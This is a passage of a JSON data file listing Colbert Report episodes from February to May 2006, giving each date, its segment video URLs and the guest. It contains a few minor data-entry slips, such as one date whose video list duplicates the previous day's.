        "http://thecolbertreport.cc.com/videos/zfo99j/lieber---minimum-wage",
        "http://thecolbertreport.cc.com/videos/qm6xwf/emily-yoffe",
        "http://thecolbertreport.cc.com/videos/359g3f/sign-off---blue-collar-workday"
      ],
      "guest": "Emily Yoffe"
    },
    {
      "date": "2006-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1dag2u/intro---2-2-06",
        "http://thecolbertreport.cc.com/videos/ad4eb4/groundhog-day-forecast",
        "http://thecolbertreport.cc.com/videos/3bftnm/stephen-s-famous-five-meat-chili",
        "http://thecolbertreport.cc.com/videos/xbb82c/the-word---aggravated-assault",
        "http://thecolbertreport.cc.com/videos/lggm23/better-know-a-district---new-york-s-8th---jerrold-nadler",
        "http://thecolbertreport.cc.com/videos/waxwaq/christine-todd-whitman",
        "http://thecolbertreport.cc.com/videos/1q178e/sign-off---tivo"
      ],
      "guest": "Gov. Christine Todd Whitman"
    },
    {
      "date": "2006-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dpnfel/intro---2-6-06",
        "http://thecolbertreport.cc.com/videos/x1tmbw/birth-day-off",
        "http://thecolbertreport.cc.com/videos/1gk1h5/the-golden-corner",
        "http://thecolbertreport.cc.com/videos/r9ih4w/the-word---metaphorically",
        "http://thecolbertreport.cc.com/videos/4xxw86/threatdown---killer-bees",
        "http://thecolbertreport.cc.com/videos/kckjlf/fract---native-american-state-names",
        "http://thecolbertreport.cc.com/videos/lynt84/barbara-boxer",
        "http://thecolbertreport.cc.com/videos/xaj1wb/to-be-continued"
      ],
      "guest": "Barbara Boxer"
    },
    {
      "date": "2006-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aa2a90/intro---2-7-06",
        "http://thecolbertreport.cc.com/videos/nzdokc/math-is-hard",
        "http://thecolbertreport.cc.com/videos/iwl7g4/the-word---kidding",
        "http://thecolbertreport.cc.com/videos/pc9syn/fract---frnap--royalty",
        "http://thecolbertreport.cc.com/videos/uvx8kk/james-woolsey",
        "http://thecolbertreport.cc.com/videos/xx0m7n/western-union"
      ],
      "guest": "R. James Woolsey"
    },
    {
      "date": "2006-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3vblh5/intro---2-8-06",
        "http://thecolbertreport.cc.com/videos/zmpne2/b-b-b-l-t-",
        "http://thecolbertreport.cc.com/videos/0qolhd/electronic-surveillance",
        "http://thecolbertreport.cc.com/videos/pi8m0r/the-word---eureka",
        "http://thecolbertreport.cc.com/videos/29usyw/better-know-a-district---pennsylvania-s-2nd---chaka-fattah",
        "http://thecolbertreport.cc.com/videos/flyja7/fract---bush-s-height",
        "http://thecolbertreport.cc.com/videos/6jmw8z/alan-dershowitz",
        "http://thecolbertreport.cc.com/videos/96mt5f/the-in-box---terry"
      ],
      "guest": "Alan Dershowitz"
    },
    {
      "date": "2006-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/afiwhq/intro---2-9-06",
        "http://thecolbertreport.cc.com/videos/qryfzw/big-brass-balls-award",
        "http://thecolbertreport.cc.com/videos/c00cpa/the-word---u-s-a---u-s-a--",
        "http://thecolbertreport.cc.com/videos/wpi1k4/stephen-s-laws-of-love",
        "http://thecolbertreport.cc.com/videos/8rwy8k/george-packer",
        "http://thecolbertreport.cc.com/videos/33a8tw/charlene--i-m-right-behind-you-"
      ],
      "guest": "George Packer"
    },
    {
      "date": "2006-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z5opi6/intro---2-21-06",
        "http://thecolbertreport.cc.com/videos/uo23hp/accidental-shooting",
        "http://thecolbertreport.cc.com/videos/loo817/the-word---u-s-a---u-s-a--",
        "http://thecolbertreport.cc.com/videos/u7vgjy/better-know-a-district---new-jersey-s-13th",
        "http://thecolbertreport.cc.com/videos/gb5q2m/fract---americana",
        "http://thecolbertreport.cc.com/videos/zyrf0h/lama-surya-das",
        "http://thecolbertreport.cc.com/videos/501uix/sign-off---dna"
      ],
      "guest": "Lama Surya Das"
    },
    {
      "date": "2006-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i0btk9/intro---2-22-06",
        "http://thecolbertreport.cc.com/videos/9a1fo6/speed-skating-debacle",
        "http://thecolbertreport.cc.com/videos/0g837q/the-word---absolutely-maybe",
        "http://thecolbertreport.cc.com/videos/mvtu98/threatdown---gay-adoption",
        "http://thecolbertreport.cc.com/videos/jkkvih/michael-eric-dyson"
      ],
      "guest": "Michael Eric Dyson"
    },
    {
      "date": "2006-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v60d4d/intro---2-23-06",
        "http://thecolbertreport.cc.com/videos/rr6syc/threatdown---bears",
        "http://thecolbertreport.cc.com/videos/754igf/presidential-visions",
        "http://thecolbertreport.cc.com/videos/s0zne3/the-word---hippocratical",
        "http://thecolbertreport.cc.com/videos/kftjaw/pharmaceuticals--prescription-for-progress",
        "http://thecolbertreport.cc.com/videos/rsogzl/david-brooks",
        "http://thecolbertreport.cc.com/videos/azjwel/sign-off---pause-your-tvs"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2006-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/te5not/intro---2-27-06",
        "http://thecolbertreport.cc.com/videos/a6q20s/the-de-deification-of-the-american-faithscape",
        "http://thecolbertreport.cc.com/videos/opnyg5/who-hates-whom-in-the-name-of-god",
        "http://thecolbertreport.cc.com/videos/2hdt17/the-word---trial-separation",
        "http://thecolbertreport.cc.com/videos/5ggers/pick-your-apocalypse",
        "http://thecolbertreport.cc.com/videos/oop06i/tony-campolo",
        "http://thecolbertreport.cc.com/videos/14uaa2/confess-your-sins-to-stephen"
      ],
      "guest": "Tony Campolo"
    },
    {
      "date": "2006-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cebyqr/intro---2-28-06",
        "http://thecolbertreport.cc.com/videos/roej3y/who-s-attacking-me-now----anderson-cooper",
        "http://thecolbertreport.cc.com/videos/bdairu/the-word---laissez-les-bons-temps-rouler-",
        "http://thecolbertreport.cc.com/videos/2v3htj/tip-wag---wheeled-transportation",
        "http://thecolbertreport.cc.com/videos/sz96fe/brett-o-donnell"
      ],
      "guest": "Brett O'Donnell"
    },
    {
      "date": "2006-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ldd32b/intro---3-1-06",
        "http://thecolbertreport.cc.com/videos/jndc1b/better-know-a-district---california-s-50th",
        "http://thecolbertreport.cc.com/videos/4j8lfp/the-word---faith",
        "http://thecolbertreport.cc.com/videos/1bozfl/better-know-a-founder---benjamin-franklin",
        "http://thecolbertreport.cc.com/videos/11m5ii/arianna-huffington"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2006-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ubq51o/intro---3-2-06",
        "http://thecolbertreport.cc.com/videos/stez1k/the-word---homo-sapien-agenda",
        "http://thecolbertreport.cc.com/videos/3k2tf6/the-dacolbert-code---the-oscars",
        "http://thecolbertreport.cc.com/videos/gltobj/jeffrey-sachs",
        "http://thecolbertreport.cc.com/videos/wx4nw0/sign-off---end-of-an-era"
      ],
      "guest": "Jeffrey Sachs"
    },
    {
      "date": "2006-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/404ffy/intro---3-6-06",
        "http://thecolbertreport.cc.com/videos/l42kmx/hollywood-decontamination",
        "http://thecolbertreport.cc.com/videos/tsfsdu/never-say-die",
        "http://thecolbertreport.cc.com/videos/5tdn6m/the-word---spoiler-alert-",
        "http://thecolbertreport.cc.com/videos/tua61a/threatdown---non-blondes",
        "http://thecolbertreport.cc.com/videos/rlta2z/bob-schieffer",
        "http://thecolbertreport.cc.com/videos/iwpji5/sign-off---narnia"
      ],
      "guest": "Bob Schieffer"
    },
    {
      "date": "2006-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ca0riz/intro---3-7-06",
        "http://thecolbertreport.cc.com/videos/4cutks/colbert-manor",
        "http://thecolbertreport.cc.com/videos/mtcb44/the-word---the-long-war",
        "http://thecolbertreport.cc.com/videos/g0hyvn/all-you-need-to-know---video-games",
        "http://thecolbertreport.cc.com/videos/8n27zq/norman-ornstein"
      ],
      "guest": "Norman Ornstean"
    },
    {
      "date": "2006-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xbwofw/intro---3-8-06",
        "http://thecolbertreport.cc.com/videos/x1smyo/colbert-manor-revisited",
        "http://thecolbertreport.cc.com/videos/to3c41/the-word---monopoly",
        "http://thecolbertreport.cc.com/videos/qhlrjh/stephen-s-sound-advice---civil-war-do-s---don-ts",
        "http://thecolbertreport.cc.com/videos/1ggda8/fract---america-rocks",
        "http://thecolbertreport.cc.com/videos/ovaery/james-webb",
        "http://thecolbertreport.cc.com/videos/vggdk5/used-flag-offer"
      ],
      "guest": "James Webb"
    },
    {
      "date": "2006-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vaflyt/intro---3-9-06",
        "http://thecolbertreport.cc.com/videos/dx0yti/canadian-baseball-",
        "http://thecolbertreport.cc.com/videos/6l67tv/the-word---d-i-y-",
        "http://thecolbertreport.cc.com/videos/7oy8db/better-know-a-district---california-s-39th-district---linda-sanchez",
        "http://thecolbertreport.cc.com/videos/15d41c/lorraine-bracco"
      ],
      "guest": "Lorraine Bracco"
    },
    {
      "date": "2006-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d7ebhg/intro---3-13-06",
        "http://thecolbertreport.cc.com/videos/lmy7oh/predictions",
        "http://thecolbertreport.cc.com/videos/lykn1c/not-gay",
        "http://thecolbertreport.cc.com/videos/so8v2i/the-word---sidney-poitier",
        "http://thecolbertreport.cc.com/videos/ufh2rw/christopher-buckley",
        "http://thecolbertreport.cc.com/videos/k79bmy/sign-off---mad-magazine"
      ],
      "guest": "Christopher Buckley"
    },
    {
      "date": "2006-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9rlemm/intro---3-14-06",
        "http://thecolbertreport.cc.com/videos/i3ouk4/trusting-the-media",
        "http://thecolbertreport.cc.com/videos/i5bwzw/the-word---scapegoat",
        "http://thecolbertreport.cc.com/videos/kiwto1/was-it-really-that-bad----before-unions",
        "http://thecolbertreport.cc.com/videos/402x36/fract---hawaii",
        "http://thecolbertreport.cc.com/videos/loh9en/keith-olbermann",
        "http://thecolbertreport.cc.com/videos/8vssl2/hiphopketball-ii--the-rejazzebration-remix--06"
      ],
      "guest": "Keith Olbermann"
    },
    {
      "date": "2006-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wt5xpw/intro---3-15-06",
        "http://thecolbertreport.cc.com/videos/u8eaqc/sperm-donor",
        "http://thecolbertreport.cc.com/videos/g4bu6e/the-word---none-of-the-above",
        "http://thecolbertreport.cc.com/videos/kruphn/al-franken",
        "http://thecolbertreport.cc.com/videos/usnoo7/al-franken-fields-calls",
        "http://thecolbertreport.cc.com/videos/z5ir97/craziest-f--king-thing-i-ve-ever-heard---bear-wrestling"
      ],
      "guest": "Al Franken"
    },
    {
      "date": "2006-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yna7fv/intro---3-16-06",
        "http://thecolbertreport.cc.com/videos/ecjm4u/who-s-attacking-me-now----commander-coconut",
        "http://thecolbertreport.cc.com/videos/2m2cs5/the-word---sweet-dreams",
        "http://thecolbertreport.cc.com/videos/kgsuha/better-know-a-protectorate---the-virgin-islands---donna-christensen",
        "http://thecolbertreport.cc.com/videos/6o7ym9/frank-vincent",
        "http://thecolbertreport.cc.com/videos/cycayo/sign-off---i-ll-miss-you"
      ],
      "guest": "Frank Vincent"
    },
    {
      "date": "2006-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnadg0/intro---3-20-06",
        "http://thecolbertreport.cc.com/videos/isowuv/movies-that-are-destroying-america---post-oscar-wrap-up",
        "http://thecolbertreport.cc.com/videos/vr4vvt/connie-chung",
        "http://thecolbertreport.cc.com/videos/yuth1j/jessica-simpson-turns-down-gop",
        "http://thecolbertreport.cc.com/videos/6xoiww/war-in-iraq---third-anniversary",
        "http://thecolbertreport.cc.com/videos/b7697r/the-word---stop-it"
      ],
      "guest": "Connie Chung"
    },
    {
      "date": "2006-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xvs8w8/intro---3-21-06",
        "http://thecolbertreport.cc.com/videos/zze24r/world-baseball-classic",
        "http://thecolbertreport.cc.com/videos/teon93/the-word---eat-it",
        "http://thecolbertreport.cc.com/videos/eh7h1y/employee-performance-reviews",
        "http://thecolbertreport.cc.com/videos/nbiu6f/steve-kroft",
        "http://thecolbertreport.cc.com/videos/jt1thw/the-in-box---corrections"
      ],
      "guest": "Steve Kroft"
    },
    {
      "date": "2006-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/70ntar/intro---3-22-06",
        "http://thecolbertreport.cc.com/videos/nw6pi6/advice-for-jennifer-anniston",
        "http://thecolbertreport.cc.com/videos/gx67le/better-know-a-district---california-s-27th---brad-sherman",
        "http://thecolbertreport.cc.com/videos/c3fb4g/the-word---i-am-the-great-and-powerful-oz",
        "http://thecolbertreport.cc.com/videos/uqd7r1/dan-senor",
        "http://thecolbertreport.cc.com/videos/qay3pj/sign-off---thank-you--america"
      ],
      "guest": "Dan Senor"
    },
    {
      "date": "2006-03-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou0ql7/intro---3-23-06",
        "http://thecolbertreport.cc.com/videos/rxxsf1/home--hearth--heart-and-heartland---this-land-is-your-land",
        "http://thecolbertreport.cc.com/videos/1q0pl8/miss-manners",
        "http://thecolbertreport.cc.com/videos/jeurtc/stephen-s-sound-advice---how-to-raise-a-hero",
        "http://thecolbertreport.cc.com/videos/3x5mhp/john-kasich",
        "http://thecolbertreport.cc.com/videos/tgvvyb/sign-off---the-reason-for-the-hearth"
      ],
      "guest": "John Kasich"
    },
    {
      "date": "2006-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvu55b/intro---3-27-06",
        "http://thecolbertreport.cc.com/videos/lu2x91/off-the-market",
        "http://thecolbertreport.cc.com/videos/b1jlbx/immigration-protests",
        "http://thecolbertreport.cc.com/videos/hizymr/exercise-routine",
        "http://thecolbertreport.cc.com/videos/fafxll/the-word---tense",
        "http://thecolbertreport.cc.com/videos/jmwqn6/letter-to-the-judge",
        "http://thecolbertreport.cc.com/videos/6zqqyf/threatdown---drug-candy",
        "http://thecolbertreport.cc.com/videos/hx3fbe/fract---bald-eagle",
        "http://thecolbertreport.cc.com/videos/i44o34/gary-hart",
        "http://thecolbertreport.cc.com/videos/bwhjyd/sign-off---tomorrow-s-guest"
      ],
      "guest": "Gary Hart"
    },
    {
      "date": "2006-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9tw416/intro---3-28-06",
        "http://thecolbertreport.cc.com/videos/wm4vs8/baby-eagle",
        "http://thecolbertreport.cc.com/videos/4s1h3q/the-word---easter-under-attack---marketing",
        "http://thecolbertreport.cc.com/videos/erxj6i/lieber---school-vouchers",
        "http://thecolbertreport.cc.com/videos/3ejtt4/fract---commemorative-spoons",
        "http://thecolbertreport.cc.com/videos/tyfnef/michael-brown",
        "http://thecolbertreport.cc.com/videos/t4qaaf/sign-off---goodnight--stephen-jr-"
      ],
      "guest": "Michael Brown"
    },
    {
      "date": "2006-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4mdlim/intro---3-29-06",
        "http://thecolbertreport.cc.com/videos/r9z4ro/eclipse",
        "http://thecolbertreport.cc.com/videos/mqt5m8/the-word---merrier",
        "http://thecolbertreport.cc.com/videos/3xpeh4/better-know-a-district---california-s-29th---adam-schiff",
        "http://thecolbertreport.cc.com/videos/k1c0hq/bruce-bartlett"
      ],
      "guest": "Bruce Bartlett"
    },
    {
      "date": "2006-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uaktnl/intro---3-30-06",
        "http://thecolbertreport.cc.com/videos/89u375/what-jill-carroll-missed",
        "http://thecolbertreport.cc.com/videos/nuwaus/women-s-history-month---soledad-o-brien",
        "http://thecolbertreport.cc.com/videos/smbaky/tip-wag---the-templeton-prize",
        "http://thecolbertreport.cc.com/videos/n7sm3g/fract---drug-testing-standards",
        "http://thecolbertreport.cc.com/videos/b95nrh/robert-greenwald",
        "http://thecolbertreport.cc.com/videos/0vbmc1/million-man-march",
        "http://thecolbertreport.cc.com/videos/zcqswd/the-word---f--k"
      ],
      "guest": "Robert Greenwald"
    },
    {
      "date": "2006-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r2tcqv/intro---4-3-06",
        "http://thecolbertreport.cc.com/videos/cckn97/who-s-honoring-me-now----southern-poverty-law-center",
        "http://thecolbertreport.cc.com/videos/j51p1g/the-word---stay-the-course",
        "http://thecolbertreport.cc.com/videos/mq3zja/stephen-s-sound-advice---taxes",
        "http://thecolbertreport.cc.com/videos/ci41dt/michael-smerconish",
        "http://thecolbertreport.cc.com/videos/716068/sign-off---nutz"
      ],
      "guest": "Michael Smerconish"
    },
    {
      "date": "2006-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ew48u/intro---4-4-06",
        "http://thecolbertreport.cc.com/videos/ouryux/delay-retires",
        "http://thecolbertreport.cc.com/videos/3pmhdv/the-word---birdie",
        "http://thecolbertreport.cc.com/videos/fgj62q/balls-for-kidz---plastic-surgery",
        "http://thecolbertreport.cc.com/videos/3sqfo3/jesse-jackson"
      ],
      "guest": "Jesse Jackson"
    },
    {
      "date": "2006-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pxrtxy/intro---4-5-06",
        "http://thecolbertreport.cc.com/videos/1sxrid/crying",
        "http://thecolbertreport.cc.com/videos/alac6s/the-word---martyr",
        "http://thecolbertreport.cc.com/videos/6ythy9/formidable-opponent---immigration",
        "http://thecolbertreport.cc.com/videos/4ipowz/fract---russian-girls",
        "http://thecolbertreport.cc.com/videos/7hiane/harvey-mansfield",
        "http://thecolbertreport.cc.com/videos/7q90hr/sign-off---en-espanol"
      ],
      "guest": "Harvey Mansfield"
    },
    {
      "date": "2006-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4p2khi/intro---4-6-06",
        "http://thecolbertreport.cc.com/videos/yy1ecn/who-s-not-honoring-me-now----peabody-award",
        "http://thecolbertreport.cc.com/videos/wh4nku/easter-under-attack---recalled-eggs",
        "http://thecolbertreport.cc.com/videos/h6f8ks/the-word---nazis",
        "http://thecolbertreport.cc.com/videos/hqbc11/better-know-a-district---oregon-s-5th---darlene-hooley",
        "http://thecolbertreport.cc.com/videos/2v5yd4/markos-moulitsas",
        "http://thecolbertreport.cc.com/videos/a2gy6a/sign-off---spring-break"
      ],
      "guest": "Markos Moulitsas"
    },
    {
      "date": "2006-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rho2b5/intro---4-17-06",
        "http://thecolbertreport.cc.com/videos/jh0t6d/dime-boycott",
        "http://thecolbertreport.cc.com/videos/nyextq/on-notice---journal-of-paleolimnology",
        "http://thecolbertreport.cc.com/videos/swdzeg/was-it-really-that-bad----san-francisco-earthquake",
        "http://thecolbertreport.cc.com/videos/8ydrv2/reza-aslan",
        "http://thecolbertreport.cc.com/videos/nfyuyx/craziest-f--king-thing-i-ve-ever-heard---fly-glasses"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2006-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mwy60m/intro---4-18-06",
        "http://thecolbertreport.cc.com/videos/8zlfj4/stephen-jr--hatches-",
        "http://thecolbertreport.cc.com/videos/gi0de7/the-word---sir--yes--sir",
        "http://thecolbertreport.cc.com/videos/6epoa4/threatdown---pooh",
        "http://thecolbertreport.cc.com/videos/5peygv/anthony-romero",
        "http://thecolbertreport.cc.com/videos/9g88m0/baby-monitor",
        "http://thecolbertreport.cc.com/videos/sdky8q/who-s-not-honoring-me-now----pulitzer-prize"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2006-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msbasq/intro---4-19-06",
        "http://thecolbertreport.cc.com/videos/8e53yj/white-house-press-secretary",
        "http://thecolbertreport.cc.com/videos/usn2co/global-warming-tv",
        "http://thecolbertreport.cc.com/videos/ai2zb9/the-word---save-it",
        "http://thecolbertreport.cc.com/videos/0nrquc/tip-wag---tom-cruise-and-katie-holmes",
        "http://thecolbertreport.cc.com/videos/x40hn2/caitlin-flanagan"
      ],
      "guest": "Caitlin Flanagan"
    },
    {
      "date": "2006-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ejbl27/intro---4-20-06",
        "http://thecolbertreport.cc.com/videos/qw6of6/protecting-kids-from-papers",
        "http://thecolbertreport.cc.com/videos/agw4nc/the-word---bard",
        "http://thecolbertreport.cc.com/videos/yrza7w/better-know-a-district---maryland-s-4th---albert-wynn",
        "http://thecolbertreport.cc.com/videos/isrl05/ralph-nader"
      ],
      "guest": "Ralph Nader"
    },
    {
      "date": "2006-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ed2ifv/intro---4-24-06",
        "http://thecolbertreport.cc.com/videos/yd10jl/wok-this-way",
        "http://thecolbertreport.cc.com/videos/nhj8qv/money---politics--the-machine-that-ain-t-broke",
        "http://thecolbertreport.cc.com/videos/z1f4bz/duke-obilia-auction",
        "http://thecolbertreport.cc.com/videos/svw55c/hugh-hewitt",
        "http://thecolbertreport.cc.com/videos/qzp0e4/sign-off---chatty-cathy"
      ],
      "guest": "Hugh Hewitt"
    },
    {
      "date": "2006-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h6j9ry/intro---4-25-06",
        "http://thecolbertreport.cc.com/videos/y1ry7v/contacting-john-lennon",
        "http://thecolbertreport.cc.com/videos/ef5fdk/the-word---panama",
        "http://thecolbertreport.cc.com/videos/6iaobq/threatdown---tom-hanks",
        "http://thecolbertreport.cc.com/videos/6smo0z/fract---middle-name",
        "http://thecolbertreport.cc.com/videos/gael38/sam-harris",
        "http://thecolbertreport.cc.com/videos/f00cpp/sign-off---bush-clock"
      ],
      "guest": "Sam Harris"
    },
    {
      "date": "2006-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xo40za/intro---4-26-06",
        "http://thecolbertreport.cc.com/videos/pjxlyg/armed-and-ready",
        "http://thecolbertreport.cc.com/videos/hhuez9/the-word---english",
        "http://thecolbertreport.cc.com/videos/ydqtim/better-know-a-district---georgia-s-11th---phil-gingrey",
        "http://thecolbertreport.cc.com/videos/thlh72/sebastian-junger",
        "http://thecolbertreport.cc.com/videos/8puf3y/sign-off---yellowcake"
      ],
      "guest": "Sebastian Junger"
    },
    {
      "date": "2006-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ry4l9/intro---4-27-06",
        "http://thecolbertreport.cc.com/videos/z7tcn4/snow--informer",
        "http://thecolbertreport.cc.com/videos/6lr3t0/the-word---white-gloves",
        "http://thecolbertreport.cc.com/videos/b4nnko/plagiarism",
        "http://thecolbertreport.cc.com/videos/g4i72k/all-you-need-to-know---sleight-of-hand",
        "http://thecolbertreport.cc.com/videos/u54lrz/bill-kristol",
        "http://thecolbertreport.cc.com/videos/efk2x7/sign-off---the-nfl-draft"
      ],
      "guest": "Bill Kristol"
    },
    {
      "date": "2006-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w2hp62/intro---5-1-06",
        "http://thecolbertreport.cc.com/videos/7jined/white-house-correspondents--dinner",
        "http://thecolbertreport.cc.com/videos/8uzt2n/the-word---drug-fueled-sex-crime",
        "http://thecolbertreport.cc.com/videos/yzcgdu/tip-wag---exxon",
        "http://thecolbertreport.cc.com/videos/5ptkiy/jon-meacham",
        "http://thecolbertreport.cc.com/videos/i3oqoh/sign-off---spam"
      ],
      "guest": "Jon Meacham"
    },
    {
      "date": "2006-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/341pc6/intro---5-2-06",
        "http://thecolbertreport.cc.com/videos/y9f7ks/magic-",
        "http://thecolbertreport.cc.com/videos/fdtzal/the-word---healthy-appetite",
        "http://thecolbertreport.cc.com/videos/hl6b8d/stephen-for-press-secretary",
        "http://thecolbertreport.cc.com/videos/lh3j87/mike-huckabee"
      ],
      "guest": "Governor Mike Huckabee"
    },
    {
      "date": "2006-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wjeu9g/intro---5-3-06",
        "http://thecolbertreport.cc.com/videos/72mru6/alan-town",
        "http://thecolbertreport.cc.com/videos/gdu7ux/the-word---name-game",
        "http://thecolbertreport.cc.com/videos/f8iv5g/stephen-s-sound-advice---gas-prices",
        "http://thecolbertreport.cc.com/videos/3pdcz2/paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/65gltn/betterer-know-a-district---georgia-s-11th---phil-gingrey-bonus-edition"
      ],
      "guest": "Paul Rieckhoff"
    },
    {
      "date": "2006-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mtzlgi/exclusive---better-know-a-district---oregon-s-3rd---earl-blumenauer",
        "http://thecolbertreport.cc.com/videos/pgiz58/intro---5-4-06",
        "http://thecolbertreport.cc.com/videos/ox5eqb/national-day-of-prayer",
        "http://thecolbertreport.cc.com/videos/38ws3t/the-word---indulgence",
        "http://thecolbertreport.cc.com/videos/h6w8h9/better-know-a-district---oregon-s-3rd---earl-blumenauer",
        "http://thecolbertreport.cc.com/videos/71jv5y/rick-reilly",
        "http://thecolbertreport.cc.com/videos/4uy12b/stephen-s-keys"
      ],
      "guest": "Rick Reilly"
    },
    {
      "date": "2006-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6p8qc0/intro---5-8-06",
        "http://thecolbertreport.cc.com/videos/gk0182/stegul",
        "http://thecolbertreport.cc.com/videos/fyqj80/porter-goss-resignation",
        "http://thecolbertreport.cc.com/videos/3ig0g8/the-word---not",
        "http://thecolbertreport.cc.com/videos/zdkg2i/shere-hite",
        "http://thecolbertreport.cc.com/videos/7581zo/sign-off---thank-you--stephen-"
      ],
      "guest": "Shere Hite"
    },
    {
      "date": "2006-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v9p03c/intro---5-9-06",
        "http://thecolbertreport.cc.com/videos/t6b1ke/double-or-nothing",
        "http://thecolbertreport.cc.com/videos/mjq9vh/the-word---superegomaniac",
        "http://thecolbertreport.cc.com/videos/9w4u9e/movies-that-are-destroying-america---summer-movies",
        "http://thecolbertreport.cc.com/videos/s2q4vq/frank-rich",
        "http://thecolbertreport.cc.com/videos/hofw72/sign-off---closing-credits-contest"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2006-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j0109g/exclusive---better-know-a-district---nebraska-s-2nd---lee-terry",
        "http://thecolbertreport.cc.com/videos/z0wmkf/intro---5-10-06",
        "http://thecolbertreport.cc.com/videos/pc9isx/the-bird-flu",
        "http://thecolbertreport.cc.com/videos/6olwle/the-word---athletes-are-above-the-law",
        "http://thecolbertreport.cc.com/videos/m1vdpp/better-know-a-district---nebraska-s-2nd---lee-terry",
        "http://thecolbertreport.cc.com/videos/kuohzs/william-bastone",
        "http://thecolbertreport.cc.com/videos/pksza0/sign-off---what-you-deserve"
      ],
      "guest": "Bill Bastone"
    },
    {
      "date": "2006-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3oo94k/intro---5-11-06",
        "http://thecolbertreport.cc.com/videos/jn8cw4/the-west-wing",
        "http://thecolbertreport.cc.com/videos/j7pjuz/the-word---fill--er-up",
        "http://thecolbertreport.cc.com/videos/yy27qi/madeleine-albright",
        "http://thecolbertreport.cc.com/videos/8nl4m3/tip-wag---gold"
      ],
      "guest": "Madeleine Albright"
    },
    {
      "date": "2006-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uhk7yp/intro---5-15-06",
        "http://thecolbertreport.cc.com/videos/nxszdr/ahmadinejad-s-letter",
        "http://thecolbertreport.cc.com/videos/g2h9yx/the-word---lunchables",
        "http://thecolbertreport.cc.com/videos/pn3k09/summaries-of-summaries",
        "http://thecolbertreport.cc.com/videos/f5iuwt/all-you-need-to-know---dick-cheney",
        "http://thecolbertreport.cc.com/videos/qrt5tg/kevin-phillips",
        "http://thecolbertreport.cc.com/videos/lww1s9/craziest-f--king-thing-i-ve-ever-heard---gas-prices"
      ],
      "guest": "Kevin Phillips"
    },
    {
      "date": "2006-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x3193a/intro---5-16-06",
        "http://thecolbertreport.cc.com/videos/swctyt/the-word---inoculation",
        "http://thecolbertreport.cc.com/videos/5qdvts/billboard",
        "http://thecolbertreport.cc.com/videos/r5u8hp/body-parts-for-sale",
        "http://thecolbertreport.cc.com/videos/kdtmpm/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/53mwdm/search-for-a-new-black-friend"
      ],
      "guest": "Tyson Slocum"
    },
    {
      "date": "2006-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8b6qml/exclusive---better-know-a-president---theodore-roosevelt",
        "http://thecolbertreport.cc.com/videos/x3193a/intro---5-16-06",
        "http://thecolbertreport.cc.com/videos/swctyt/the-word---inoculation",
        "http://thecolbertreport.cc.com/videos/5qdvts/billboard",
        "http://thecolbertreport.cc.com/videos/r5u8hp/body-parts-for-sale",
        "http://thecolbertreport.cc.com/videos/kdtmpm/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/53mwdm/search-for-a-new-black-friend"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2006-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wnj4cc/intro---5-17-06",
        "http://thecolbertreport.cc.com/videos/xie8nv/the-word---democrats",
        "http://thecolbertreport.cc.com/videos/3w6t72/better-know-a-president---theodore-roosevelt",
